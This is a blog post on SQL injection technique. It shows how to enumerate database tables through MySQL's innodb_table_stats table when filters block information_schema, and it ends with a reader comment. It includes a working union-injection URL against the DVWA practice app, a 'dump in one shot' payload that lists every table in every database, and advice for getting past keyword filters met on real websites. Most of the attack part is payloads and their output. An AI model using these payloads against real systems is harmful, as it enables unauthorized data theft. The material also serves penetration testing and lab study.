Alternative for Information_Schema.Tables in MySQL


Starting from MySQL 5.5 and above the default storage engine was known as the InnoDB. In MySQL versions 5.5 and above if you do a ā€œselect @@innodb_versionā€ you can see the version of the InnoDB, which is almost same as your MySQL version.

But in MySQL 5.6 and above I noticed 2 new tables by InnoDB. ā€œinnodb_index_statsā€ and ā€œinnodb_table_statsā€. Both these tables contains the database and table names of all the newly created databases and tables.
The MySQL documentation explains these two tables as follows.

The persistent statistics feature relies on the internally managed tables in the mysql database, named innodb_table_stats and innodb_index_stats. These tables are set up automatically in all install, upgrade, and build-from-source procedures.

For injection purposes letā€™s take the ā€œinnodb_table_statsā€ table. Unfortunately InnoDB doesnā€™t store columns.

If you simply do ā€œshow tables in mysqlā€ you can view this from your localhost.


If we have a look at the table we can see that we can use this as an alternative for ā€œinformation_schema.tablesā€.

select * from mysql.innodb_table_stats;



select table_name from mysql.innodb_table_stats where database_name=schema();

Example using DVWA

http://localhost/dvwa/vulnerabilities/sqli/?id=1' union select 1,group_concat(table_name) from mysql.innodb_table_stats where database_name=schema()%23&Submit=Submit%23


Dump in One Shot

Hereā€™s the DIOS query which I made to dump all tables from all databases. You can modify this query to suit your needs. When injecting you may have to URL encode.

concat(0x404f73616e64614d616c6974680a, @@innodb_version ,0x0a,user(),0x0a, schema(), (select (@x) from (select (@x:=0x00), (@number:=0),(select (0) from (mysql.innodb_table_stats) where (@x:=concat(@x,0x0a,lpad(@number:=@number+1,2,0),0x2e20,database_name, 0x202d3e20 ,table_name,0x202d3e20 ,length(table_name)))))x))


01. dvwa -> guestbook -> 9
02. dvwa -> users -> 5
03. mysql -> npn -> 3
04. security -> emails -> 6
05. security -> referers -> 8
06. security -> uagents -> 7
07. security -> users -> 5


In real world scenarios Iā€™ve came across websites where ā€˜\or\iā€™ is being filtered. In these cases we cannot use the word ā€˜informationā€™ since it contains the word ā€˜orā€™. If the InnoDB version is 5.6 or above and the current user can access the ā€˜mysqlā€™ database then we can use this method to extract the tables names. The same can be applied to MariaDB as well.


SQLi is often a cancerous topic, if you plan to copy or share please give credits to the author.

6 thoughts on “Alternative for Information_Schema.Tables in MySQL

  1. Nice post. This gives me an alternative method with injection while there are some filter rules about information.schema.tables~ And is there any method to retrieve column_name if there are some filter rules about information.schema.* ?

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